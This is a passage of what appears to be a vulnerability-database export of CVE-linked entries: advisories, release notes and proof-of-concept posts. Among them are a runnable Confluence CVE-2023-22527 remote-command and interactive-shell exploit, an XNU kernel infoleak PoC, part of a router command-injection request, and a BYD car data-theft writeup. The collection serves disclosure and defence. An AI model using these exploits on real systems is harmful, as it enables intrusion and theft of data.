appropriate values for actual use)\n  \n        # parameter for evade verification  \n        send_byte = b\"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=\" + final_code  \n  \n        # POST request headers \n        headers = b\"POST /boafrm/formIpQoS HTTP/1.1\\r\\n\" \\  \n                  b\"Host: \" + HOST.encode('utf-8') + b\"\\r\\n\" \\  \n                                                     b\"Content-Type: application/octet-stream\\r\\n\" \\  \n                                                     b\"Content-Length: \" + str(len(send_byte)).encode(  \n            'utf-8') + b\"\\r\\nConnection: close\\r\\n\\r\\n\"  \n  \n        # Send request (combine headers and body)  \n        ssock.send(headers + send_byte)  \n  \n        # Receive response  \n        response = b\"\"  \n        while True:  \n            data = ssock.recv(1024)  \n            if not data:  \n                break  \n            response += data  \n  \n            #Print response  \n        print(response.decode('utf-8'))\n```",
   description_format: "markdown",
   vulnerability: "CVE-2024-35106",
   creation_timestamp: "2025-02-07T03:41:54.937264+00:00",
   timestamp: "2025-02-07T03:41:54.937264+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://github.com/laskdjlaskdj12/CVE-2024-35106-POC",
         ],
      },
   ],
}

{
   uuid: "4479dea7-72fb-4d91-90f4-95ffec3e0310",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PoC - AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).",
   description: "- [PoC Tested on AMD EPYC 7B13 64-Core Processor (Milan) and AMD Ryzen 9 7940HS w/ Radeon 780M Graphics (Phoenix).](https://github.com/google/security-research/tree/master/pocs/cpus/entrysign)\n\nWe've provided these PoCs to demonstrate that this vulnerability allows an adversary to produce arbitrary microcode patches. They cause the RDRAND instruction to always return the constant 4, but also set the carry flag (CF) to 0 to indicate that the returned value is invalid. Because correct use of the RDRAND instruction requires checking that CF is 1, this PoC can not be used to compromise correctly functioning confidential computing workloads. Additional tools and resources will be made public on March 5.",
   description_format: "markdown",
   vulnerability: "CVE-2024-56161",
   creation_timestamp: "2025-02-05T07:30:51.031707+00:00",
   timestamp: "2025-02-05T07:31:30.100378+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "21f63dda-f998-4c51-b7ce-6efc09015c56",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "A vulnerability report for BYD (Chinese car maker)",
   description: "\n# Vulnerability Report - BYD QIN PLUS DM-i - Dilink OS - Incorrect Access Control\n\n**Product:** BYD QIN PLUS DM-i - Dilink OS\n\n**Vendor**: https://www.byd.com/\n\n**Version**:  3.0_13.1.7.2204050.1.\n\n**Vulnerability Type:** Incorrect Access Control\n\n**Attack Vectors**: The user installs and runs an app on the IVI system that only requires normal permissions.\n\n## Introduction\n\n​\tThe BYD QIN PLUS DM-i with Dilink OS contains an Incorrect Access Control vulnerability. Attackers can bypass permission restrictions and obtain confidential vehicle data through **Attack Path 1**: **System Log Theft** and **Attack Path 2**: **CAN Traffic Hijacking**.\n\n## Attack Path 1 : System Log Theft\n\n​\tIncorrect access control in BYD QIN PLUS DM-i Dilink OS  3.0_13.1.7.2204050.1 allows unaithorized attackers to access system  logcat logs.\n\n### Description\n\n​\tThe DiLink 3.0 system’s /system/bin/app_process64 process logs system logcat data, storing it in zip files in the /sdcard/logs folder. These logs are accessible by regular apps, allowing them to bypass restrictions, escalate privileges, and potentially copy and upload sensitive vehicle data (e.g., location, fuel/energy consumption, VIN, mileage) to an attacker’s server. This poses a serious security risk, as the data is highly confidential for both users and manufacturers.\n\n### Detailed Steps\n\n1. Check the system-collected and stored system logs.\n\n![log.png](https://s2.loli.net/2025/01/26/MRTCqKnv1aEIpQZ.png)\n\n2. The malicious app copies system files to its own private directory. The main code is as follows:\n\n<img src=\"https://s2.loli.net/2025/01/26/EqxHDSX9O5Ibhr4.png\" alt=\".png\" style=\"zoom: 50%;\" />\n\n3. The malicious app successfully steals system logs to its private directory.\n\n   ![.png](https://s2.loli.net/2025/01/26/r7vsY93LgTb6coF.png)\n\n4. Extract the file and search for sensitive confidential information in the system logs.\n\n​\t\t(a) Fuel consumption, energy consumption, and seatbelt status.\n\n![111.png](https://s2.loli.net/2025/01/26/6jkmACTRwxaX7sb.png)\n\n​\t\t(b) ICCID, VIN (Vehicle Identification Number), and model code.\n\n![vin.png](https://s2.loli.net/2025/01/26/nJWl3fq5QKVNuEx.png)\n\n​\t\t(c) Diagnostic command format.\n\n![.png](https://s2.loli.net/2025/01/26/jc3xCTkUd8a4ZF2.png)\n\n​\t\t(d) Various detailed vehicle status information.\n\n![.png](https://s2.loli.net/2025/01/26/lSTFK7thceQJ16b.png)\n\n### **Ethical Considerations**\n\n​\tThe vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in in the latest versions, with the logs now encrypted.\n\n### Additional Notes\n\n​\tOur vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.\n\n### Disclaimer\n\n​\tThis vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.\n\n\n\n## Attack Path 2 : CAN Traffic Hijacking\n\n​\tThe attacker can remotely intercept the vehicle's CAN traffic, which is supposed to be sent to the manufacturer's cloud server, and potentially use this data to infer the vehicle's status.\n\n### Description\n\n​\tIn the DiLink 3.0 system, the /system/priv-app/CanDataCollect folder is accessible to regular users, allowing them to extract CanDataCollect.apk and analyze its code. The \"com.byd.data_collection_notify\" broadcast, not protected by the system, lets apps set the CAN traffic upload URL. This enables attackers to:\n\n1. Set the upload URL to null, preventing cloud data collection.\n2. Set the upload URL to an attacker’s domain for remote CAN traffic collection.\n\n​\tAdditionally, the encoded upload files can be decrypted using reverse-engineered decoding functions, enabling attackers to remotely analyze CAN traffic and infer the vehicle's status.\n\n### Detailed Steps\n\n1. The vulnerability code for the broadcast handling in CanDataCollect.apk.\n\n<img src=\"https://s2.loli.net/2025/01/26/RanvVwJZYUuq9i8.png\" alt=\".png\" style=\"zoom:50%;\" />\n\n2. The exploitation code for the malicious app vulnerability.\n\n<img src=\"https://s2.loli.net/2025/01/26/QBC8cxEkKtuY5XT.png\" alt=\".png\" style=\"zoom:50%;\" />\n\n3. The malicious app successfully modifies the uploaded CAN traffic URL.\n\n![.png](https://s2.loli.net/2025/01/26/sugvP14iSFrAhHW.png)\n\n4. After the attack on the IVI system, the logcat logs route CAN traffic to the attacker’s server.\n\n<img src=\"https://s2.loli.net/2025/01/26/2Cxtc3UvFe9X7pn.png\" alt=\".png\" style=\"zoom: 50%;\" />\n\n5. The CAN traffic collected by the attacker and the decoded results.\n\n<img src=\"https://s2.loli.net/2025/01/27/YqinPrht6S8CFBW.png\" alt=\".png\" style=\"zoom:50%;\" />\n\n### **Ethical Considerations**\n\n​\tThe vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions.\n\n### Additional Notes:\n\n​\tOur vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe.\n\n### Disclaimer\n\n​\tThis vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.",
   description_format: "markdown",
   vulnerability: "CVE-2024-54728",
   creation_timestamp: "2025-01-26T17:57:50.934368+00:00",
   timestamp: "2025-01-26T17:57:50.934368+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
      {
         ref: [
            "https://gist.github.com/xu-yanbo202000460009/00dacd7bfede713a0f052a531da4fabd",
         ],
      },
   ],
}

{
   uuid: "b66f6073-c25f-43da-a3ab-4d70b3c8933b",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Yealink informs that the SIP-T46S has been discontinued since 2022-03-31",
   description: "\"\"\"\nDear Customers,\n\n\nYealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted.\n\n\nAfter the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service.\n\n\nThe general policy guidelines are:\n\n\n(1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes.\n\n\n(2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided.\n\n\n(3) Yealink will not offer any New Features/Enhancements support from the End of Life.\n\n\n(4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process.\n\n\n(5) Since the sixth year from the End of Life, Yealink will not offer any Support.\n\"\"\"",
   description_format: "markdown",
   vulnerability: "cve-2019-14656",
   creation_timestamp: "2025-01-24T10:18:50.387271+00:00",
   timestamp: "2025-01-24T10:18:50.387271+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
      {
         ref: [
            "https://www.yealink.com/en/product-detail/ip-phone-t46s",
         ],
      },
   ],
}

{
   uuid: "25c99b1c-5ba6-4c88-bac6-3ad6c5e525b4",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof Of Concept",
   description: "```c\n// ravi (@0xjprx)\n// 2-byte kernel infoleak, introduced in xnu-11215.1.10.\n// gcc SUSCTL.c -o susctl\n// ./susctl\n#include <stdio.h>\n#include <sys/sysctl.h>\n\nvoid leak() {\n    uint64_t val = 0;\n    size_t len = sizeof(val);\n    sysctlbyname(\"net.inet.udp.log.remote_port_excluded\", &val, &len, NULL, 0);\n    printf(\"leaked: 0x%llX 0x%llX\\n\", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);\n}\n\nint main() {\n    leak();\n    return 0;\n}\n```\n\nfrom https://github.com/jprx/CVE-2024-54507",
   description_format: "markdown",
   vulnerability: "CVE-2024-54507",
   creation_timestamp: "2025-01-24T06:21:59.299861+00:00",
   timestamp: "2025-01-24T06:32:36.489951+00:00",
   related_vulnerabilities: [
      "CVE-2024-54507",
   ],
   meta: [
      {
         ref: [
            "https://github.com/jprx/CVE-2024-54507",
            "https://jprx.io/cve-2024-54507/",
         ],
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "fa8ceb01-4bdc-4f10-8a64-5a1b671dc259",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "A particularly 'sus' sysctl in the XNU Kernel",
   description: "### Timeline\n\n* September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug.\n* Fall 2024: I reported this bug to Apple.\n* December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue.\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-54507",
   creation_timestamp: "2025-01-24T06:18:07.537395+00:00",
   timestamp: "2025-01-24T06:18:07.537395+00:00",
   related_vulnerabilities: [
      "CVE-2024-54507",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "ffe0aeca-4687-4168-a295-b0334927e4c5",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "7-Zip File Manager didn't propagate Zone.Identifier stream   for extracted files from nested archives",
   description: "~~~\n24.09          2024-11-29\n-------------------------\n- The default dictionary size values for LZMA/LZMA2 compression methods were increased:\n         dictionary size   compression level\n  v24.08  v24.09  v24.09\n          32-bit  64-bit\n    8 MB   16 MB   16 MB   -mx4\n   16 MB   32 MB   32 MB   -mx5 : Normal\n   32 MB   64 MB   64 MB   -mx6\n   32 MB   64 MB  128 MB   -mx7 : Maximum\n   64 MB   64 MB  256 MB   -mx8\n   64 MB   64 MB  256 MB   -mx9 : Ultra\n  The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB.\n- 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5.\n- APM and HFS support was improved.\n- If an archive update operation uses a temporary archive folder and\n  the archive is moved to the destination folder, 7-Zip shows the progress of moving\n  the archive file, as this operation can take a long time if the archive is large.\n- The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream\n  for extracted files from nested archives (if there is open archive inside another open archive).\n- Some bugs were fixed.\n~~~\n\n[https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/](https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/)",
   description_format: "markdown",
   vulnerability: "CVE-2025-0411",
   creation_timestamp: "2025-01-23T07:14:02.895881+00:00",
   timestamp: "2025-01-23T07:14:02.895881+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "aea0fc6c-fa3d-4e98-aef1-a25b364fb2fe",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PoC - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit",
   description: "[Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit](https://github.com/synacktiv/CVE-2024-43468)\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-43468",
   creation_timestamp: "2025-01-21T15:32:07.384792+00:00",
   timestamp: "2025-01-21T15:32:07.384792+00:00",
   related_vulnerabilities: [
      "CVE-2024-43468",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "a58dda1d-0763-4d89-ad38-22d86eb55d6a",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "POC for CVE-2023-22527 (Confluence SSTI) - Struts2",
   description: "~~~python\nimport requests\nimport argparse\n\nclass exploit:\n\tdef __init__(self, url):\n\t\tself.url = url\n\n\tdef rce(self, cmd='', header='Ret-rce'):\n\n\t\tdata = 'label=\\\\u0027%2b#request\\\\u005b\\\\u0027.KEY_velocity.struts2.context\\\\u0027\\\\u005d.internalGet(\\\\u0027ognl\\\\u0027).findValue(#parameter\ns.x,{})%2b\\\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({\"'+cmd+'\"}))\\r\\\nn'\n\t\t\n\t\tr = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = {\n\t\t\t    'Connection': 'close',\n\t\t\t    'Content-Type': 'application/x-www-form-urlencoded',\n\t\t\t    'Content-Length': str(len(data))\n\t\t\t}\n\t\t)\n\t\treturn r.text.split('<!DOCTYPE html>')[0].strip()\n\n\tdef get_env(self):\n\t\treturn self.rce(cmd='env')\n\n\tdef shell(self):\n\t\tprint('[DEBUG] Spawning semi-interactive shell ..')\n\t\twhile 1:\n\t\t\tcmd = input('$ ')\n\t\t\tresult = self.rce(cmd)\n\t\t\tprint(result)\n\n\n\ndef parse_args():\n\tparser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')\n\tparser.add_argument(\"-u\",dest=\"url\",type=str,required=False, help=\"Url\")\n\tparser.add_argument(\"-c\",dest=\"command\",type=str,required=False, default=None,help=\"Command\")\n\tparser.add_argument(\"-e\",dest=\"env\",action=\"store_true\",required=False,default=False, help=\"Get environnement vars\")\n\tparser.add_argument(\"-i\",dest=\"interactive\",action=\"store_true\",required=False,default=False, help=\"Interactive mod\")\n\treturn parser.parse_args()\n\ndef main(args):\n\tif args.command is None and not args.env and not args.interactive:\n\t\tprint('[ERROR] Please provide a command using -c option')\n\n\texp = exploit(url = args.url)\n\n\tif args.env:\n\t\tres = exp.get_env()\n\t\tprint(res)\n\n\tif args.command:\n\t\tres = exp.rce(args.command)\n\t\tprint(res)\n\n\tif args.interactive:\n\t\texp.shell()\n\nif __name__ == '__main__':\n\targs = parse_args()\n\tmain(args = args)\n\n~~~",
   description_format: "markdown",
   vulnerability: "CVE-2023-22527",
   creation_timestamp: "2025-01-17T21:29:08.826577+00:00",
   timestamp: "2025-01-17T21:29:08.826577+00:00",
   related_vulnerabilities: [
      "CVE-2023-22527",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "714ff721-cfd1-4d52-8dd7-18df34e59ed5",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2023-4047 PoC By Wild Pointer",
   description: "- [https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)",
   description_format: "markdown",
   vulnerability: "CVE-2023-4047",
   creation_timestamp: "2025-01-17T21:26:39.418096+00:00",
   timestamp: "2025-01-17T21:26:39.418096+00:00",
   related_vulnerabilities: [
      "CVE-2023-40477",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "ad2fd548-18b4-43c1-af5f-c72c3096c2a7",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Fortigate Belsen Leak - parser from @cudeso@infosec.exchange",
   description: "A quick parser to extract whois and country data from the darkweb forum post listing Fortinet devices victim to CVE-2022-40684.\n\nParser available at:\n\n[https://github.com/cudeso/tools/tree/master/CVE-2022-40684](https://github.com/cudeso/tools/tree/master/CVE-2022-40684)",
   description_format: "markdown",
   vulnerability: "CVE-2022-40684",
   creation_timestamp: "2025-01-16T16:05:29.258596+00:00",
   timestamp: "2025-01-17T05:35:29.380347+00:00",
   related_vulnerabilities: [
      "CVE-2022-40684",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=annotation",
         ],
      },
      {
         ref: [
            "https://github.com/arsolutioner/fortigate-belsen-leak",
            "https://www.linkedin.com/feed/update/urn:li:activity:7285685375585443841/",
            "https://github.com/cudeso/tools/tree/master/CVE-2022-40684",
         ],
      },
   ],
}

{
   uuid: "277659d5-c63c-4885-a40f-c84aa253dad8",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Stable Channel Update for Desktop Tuesday, January 7, 2025",
   description: "The Stable channel has been updated to 131.0.6778.264/.265 for Windows, Mac and 131.0.6778.264 for Linux which will roll out over the coming days/weeks. A full list of changes in this build is available in the Log.\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.\n\nThis update includes 4 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information.\n\n[383356864](https://issues.chromium.org/issues/383356864) High CVE-2025-0291: Type Confusion in V8. Reported by Popax21 on 2024-12-11\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.As usual, our ongoing internal security work was responsible for a wide range of fixes:\n- [388088544] Various fixes from internal audits, fuzzing and other initiatives\n\nMany of our security bugs are detected using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL.\n\nReference: [https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html](https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html)",
   description_format: "markdown",
   vulnerability: "CVE-2025-0291",
   creation_timestamp: "2025-01-08T07:56:13.906692+00:00",
   timestamp: "2025-01-08T07:56:13.906692+00:00",
   related_vulnerabilities: [
      "CVE-2025-0291",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "91d8f53c-7fde-47d2-b81a-ec31c1db425e",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "MediaTek/Android 2025-01 Security bulletins - Users are strongly encouraged to check for updates",
   description: "MediaTek has notified device manufacturers (OEMs) about these vulnerabilities and provided corresponding security patches.\n\nUsers are strongly encouraged to check for updates from their device manufacturers and apply them as soon as possible to mitigate these security risks.\n\nSee bundle: https://vulnerability.circl.lu/bundle/a30ff14f-a073-49be-8c0c-6b6afd6a19f3\n\nVarious Android devides are impacted.",
   description_format: "markdown",
   vulnerability: "CVE-2024-20144",
   creation_timestamp: "2025-01-07T07:24:43.588311+00:00",
   timestamp: "2025-01-07T07:24:43.588311+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "6608623d-c8c2-494f-a4a8-41a12a6a7cc0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PaloAlto - CVE-2024-3393 PAN-OS: Firewall Denial of Service (DoS) in DNS Security Using a Specially Crafted Packet",
   description: "# CVE-2024-3393 PAN-OS: Firewall Denial of Service (DoS) in DNS Security Using a Specially Crafted Packet\nRef: [https://security.paloaltonetworks.com/CVE-2024-3393](https://security.paloaltonetworks.com/CVE-2024-3393)\n\nA Denial of Service vulnerability in the DNS Security feature of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to send a malicious packet through the data plane of the firewall that reboots the firewall. Repeated attempts to trigger this condition will cause the firewall to enter maintenance mode.\n\nSee the Solution section for additional fixes to commonly deployed maintenance releases.\n\nDNS Security logging must be enabled for this issue to affect PAN-OS software.\n\nPalo Alto Networks is aware of customers experiencing this denial of service (DoS) when their firewall blocks malicious DNS packets that trigger this issue.\n\nThis issue is fixed in PAN-OS 10.1.14-h8, PAN-OS 10.2.10-h12, PAN-OS 11.1.5, PAN-OS 11.2.3, and all later PAN-OS versions.\n\nNote: PAN-OS 11.0 reached the end of life (EOL) on November 17, 2024, so we do not intend to provide a fix for this release.\n\nPrisma Access customers using DNS Security with affected PAN-OS versions should apply one of the workarounds provided below. We will perform upgrades in two phases for impacted customers on the weekends of January 3rd and January 10th. You can request an expedited Prisma Access upgrade to the latest PAN-OS version by opening a [support case](https://support.paloaltonetworks.com/Support/Index).\n\nIn addition, to provide the most seamless upgrade path for our customers, we are making fixes available for other TAC-preferred and commonly deployed maintenance releases.\n\nRemember to revert the Log Severity settings once the fixes are applied.\n\nUntil we perform an upgrade of your Prisma Access tenant, you can disable DNS Security logging across all NGFWs in your tenant by opening a [support case](https://support.paloaltonetworks.com/Support/Index). If you would like to expedite the upgrade, please make a note of that in the support case.\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.2:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.2:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.1:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.1:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.0:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.0:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h15:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h14:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h13:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h12:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.1:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.1:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.1:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetwork